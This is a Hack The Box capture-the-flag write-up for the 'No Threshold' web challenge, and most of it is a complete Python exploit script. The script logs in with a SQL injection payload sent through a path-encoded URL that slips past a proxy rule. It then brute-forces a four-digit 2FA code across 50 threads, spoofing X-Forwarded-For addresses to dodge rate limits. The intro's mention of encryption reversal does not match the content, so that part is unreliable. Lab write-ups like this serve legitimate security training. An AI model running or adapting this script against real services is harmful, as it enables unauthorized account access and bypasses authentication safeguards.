HackTheBox No Threshold Writeup
Explore the basics of cybersecurity in the No Threshold Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/570
Description
Prepare for the finest magic products out there. However, please be aware that we’ve implemented a specialized protective spell within our web application to guard against any black magic aimed at our web shop.🔮🎩
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
import concurrent.futures
import requests
import socket
import random
import sys
import os
class TwoFactorCracker:
def __init__(self, url):
self.url = url
self.session = requests.Session()
self.count = 0
def check_code(self, code, ip):
code_str = f'{code:04d}'
headers = {
'Host': self.url.split('//')[1].split('/')[0],
'Referer': f'{self.url}/auth/verify-2fa',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': self.url,
'X-Forwarded-For': ip
}
try:
response = self.session.post(
f'{self.url}/auth/verify-2fa',
data={'2fa-code': code_str},
headers=headers,
timeout=5
)
self.count += 1
return code_str, response
except Exception:
return code_str, None
def spoof_ips(self):
while True:
yield f"{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}"
def crack(self):
if not self._initial_exploit():
return False
ips = self.spoof_ips()
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
futures = []
current_ip = next(ips)
for i in range(10000):
if i % 20 == 0:
current_ip = next(ips)
futures.append(executor.submit(self.check_code, i, current_ip))
for future in concurrent.futures.as_completed(futures):
code_str, response = future.result()
print(f"\r\033[2KCompleted: {self.count}/10000", end='', flush=True)
if response and "flag" in response.text:
print(f"\nSuccess: {code_str}")
print(response.text)
return True
if response and response.status_code == 403:
print("\nAccess denied")
return False
return False
def _initial_exploit(self):
login_url = f'{self.url}/%2f%2f/auth/login'
payload = {
'username': '\' or 1=1 -- -',
'password': 'pass'
}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
try:
login_response = self.session.post(login_url, data=payload, headers=headers)
return login_response.status_code == 200
except:
return False
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
url = f"http://{sys.argv[1]}"
cracker = TwoFactorCracker(url)
cracker.crack()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nProcess interrupted by user. Exiting gracefully...")
os._exit(0)
Summary
The No Threshold Challenge on Hack The Box is a medium-level challenge that emphasizes brute-forcing 2FA codes while bypassing rate-limiting restrictions through IP spoofing. Participants exploit a poorly configured HAProxy load balancer by crafting HTTP requests with spoofed X-Forwarded-For headers to circumvent access controls. The challenge provides valuable hands-on experience in web exploitation, brute-forcing, and bypassing security thresholds, making it ideal for those with an intermediate understanding of cybersecurity techniques.